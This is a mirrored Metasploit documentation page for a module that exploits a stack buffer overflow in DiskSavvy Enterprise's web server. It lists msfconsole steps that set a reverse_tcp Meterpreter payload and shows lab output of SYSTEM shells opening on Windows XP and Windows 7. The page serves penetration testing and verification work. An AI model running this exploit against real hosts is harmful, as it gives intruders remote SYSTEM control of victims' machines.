CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/windows/http/disksavvy_get_bof.md
Views: 11789

Vulnerable Application

DiskSavvy Enterprise versions up to v9.3.14 are affected by a stack-based buffer overflow vulnerability which can be leveraged by an attacker to execute arbitrary code in the context of NT AUTHORITY\SYSTEM on the target. The vulnerability is caused by improper bounds checking of the request path in HTTP GET requests sent to the built-in web server. This module has been tested successfully on Windows XP SP3 and Windows 7 SP1. The vulnerable application is available for download at Exploit-DB.

Verification Steps

  1. Install a vulnerable DiskSavvy Enterprise

  2. Start Disk Savvy Enterprise service

  3. Start Disk Savvy Enterprise client application

  4. Navigate to Tools > Advanced Options > Server

  5. Check Enable Web Server On Port 80 to start the web interface

  6. Start msfconsole

  7. Do use exploit/windows/http/disksavvy_get_bof

  8. Do set rhost ip

  9. Do check

  10. Verify the target is vulnerable

  11. Do set payload windows/meterpreter/reverse_tcp

  12. Do set lhost ip

  13. Do exploit

  14. Verify the Meterpreter session is opened

Scenarios

###DiskSavvy Enterprise v9.1.14 on Windows XP SP3

msf exploit(disksavvy_get_bof) > options

Module options (exploit/windows/http/disksavvy_get_bof):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST    192.168.198.130  yes       The target address
   RPORT    80               yes       The target port
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.198.138  yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf exploit(disksavvy_get_bof) > exploit

[*] Started reverse TCP handler on 192.168.198.138:4444 
[*] Automatically detecting the target...
[*] Selected Target: DiskSavvy Enterprise v9.1.14
[*] Sending stage (957999 bytes) to 192.168.198.130
[*] Meterpreter session 1 opened (192.168.198.138:4444 -> 192.168.198.130:1140) at 2017-01-19 13:38:18 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : GABOR-03722ADE8
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter >

###DiskSavvy Enterprise v9.3.14 on Windows 7 SP1

msf exploit(disksavvy_get_bof) > set rhost 192.168.198.133
rhost => 192.168.198.130
msf exploit(disksavvy_get_bof) > exploit

[*] Started reverse TCP handler on 192.168.198.138:4444 
[*] Automatically detecting the target...
[*] Selected Target: DiskSavvy Enterprise v9.3.14
[*] Sending stage (957999 bytes) to 192.168.198.133
[*] Meterpreter session 2 opened (192.168.198.138:4444 -> 192.168.198.133:49187) at 2017-01-08 05:16:13 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-BCJL9PJ5BF5
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter >